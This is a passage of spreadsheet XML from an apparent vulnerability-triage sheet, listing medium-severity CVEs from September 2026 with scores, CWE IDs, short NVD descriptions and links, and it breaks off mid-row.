      <c r="D228" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-1050</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>A denial of service via unsigned underflow in libXpm's write path in libXpm before 3.5.19 could be used by local attackers to cause unbounded CPU usage and memory exhaustion.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94287</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97686</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in the IPNET subsystem failing to properly release allocated kernel memory and system file descriptors before terminating the calling application. Fixed in Version 26.09.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97686</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101093</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a cross-site request forgery vulnerability in admin.users.php that allows attackers to delete user groups without token verification. Attackers can craft malicious links or pages that trick authenticated administrators into deleting custom groups and their associated permissions by riding the administrator's session.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101093</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101100</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>f5, typescript</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ag-ui-protocol ag-ui up to 2026-09-07. This vulnerability affects the function FilterToolCallsMiddleware of the file sdks/typescript/packages/client/src/middleware/filter-tool-calls.ts of the component Middleware. Executing a manipulation can lead to incomplete cleanup. The attack may be launched remotely. Upgrading to version 2026-09-08 is able to resolve this issue. This patch is called c346119fe870b70f5c19738ee5119f3e1456e59d. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101100</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101859</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in RaspAP raspap-webgui up to 3.5.5. Affected by this vulnerability is the function escapeshellcmd of the file ajax/openvpn/del_ovpncfg.php of the component OpenVPN Configuration Handler. Such manipulation of the argument cfg_id leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101859</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102261</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in owen2345 Camaleon CMS up to 2.9.2. Impacted is the function crop of the file app/controllers/camaleon_cms/admin/media_controller.rb of the component Media Crop Handler. This manipulation of the argument saved_avatar causes authorization bypass. The attack may be initiated remotely. The exploit has been published and may be used. Upgrading to version 2.9.3 is recommended to address this issue. Patch name: c143e145caa600947e70a240e87f2fed889149d3. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102261</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102364</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 fails to validate the sysType field in sa-token sessions, allowing storefront customers to authenticate as back-office users by reusing their session tokens. Attackers can register on the public storefront and use their customer session token to access admin endpoints lacking @PreAuthorize permission checks, including menu listings, file uploads, and configuration endpoints.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102364</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102367</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains an insufficient session expiration vulnerability in the token refresh endpoint that fails to validate the enabled flag when issuing new sessions. Disabled user accounts can indefinitely renew their sessions through the POST /token/refresh endpoint, retaining access that account disabling was intended to remove.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102367</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82381</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a user with authoring rights on a weblog to store crafted content that is later written into the authoring UI's JavaScript string literals and markup sinks without proper encoding, causing the stored script to execute in another author's or administrator's browser. No optional feature or non-default configuration is required; this affects weblogs with multiple authors or administrators who are not mutually trusted. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which moves those values out of JavaScript literals and writes them as text.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82381</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82387</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a user with media-upload rights to store active content on Roller's origin, because the media upload feature trusts the upload-supplied content type and serves the stored file back with that type. A victim who opens the uploaded file executes the stored script. Media uploads are disabled by default; only installations that enable them are affected, and the shipped type restrictions do not block active content once uploads are on. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which derives the stored type from file content and serves non-image media as a download.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82387</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82969</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Stored XSS.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82969</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88828</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>The Blacklist Manager for WooCommerce WordPress plugin from 1.3.0 to 2.3.1 does not enforce its user blocking on every authentication path, allowing the holder of an account the site owner has blocked to keep authenticating with that account's privileges, without the block being enforced or recorded.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88828</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93539</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>kubernetes, requests, gin, suse</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was discovered in Fleet's Git webhook receiver (the gitjob webhook service). When a webhook secret is not configured, incoming webhook requests are accepted without verification, and processing a request can change the spec.pollingInterval field of a matching GitRepo resource in any namespace. A caller with network access to the webhook service and no Kubernetes credentials can therefore alter GitRepo configuration outside
the namespaces they are authorized for.  This only affects SUSE Rancher Fleet 0.16 before 0.16.2, older versions are not affected.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93539</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100753</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Real Estate Manager (Free) &lt; 6.7.9 -  The public property-detail page’s “leave a review” form repopulates its title field directly from the request with no escaping and no filtering function of any kind, unlike the adjacent comment field on the same form, which at least receives partial tag-stripping. A " character in the title query parameter breaks out of the HTML attribute the value is placed in, allowing a following &lt;script&gt; element to execute in the browser of anyone who loads the crafted link.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100753</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101003</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>f5, go</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Cesanta Mongoose up to 7.21. Affected by this vulnerability is the function fn of the file tutorials/mqtt/mqtt-server/main.c of the component MQTT Broker. Executing a manipulation can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 7.22 addresses this issue. This patch is called a9df523f76f43a38bd53b4232b9cfd4c16869e71. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101003</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101054</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
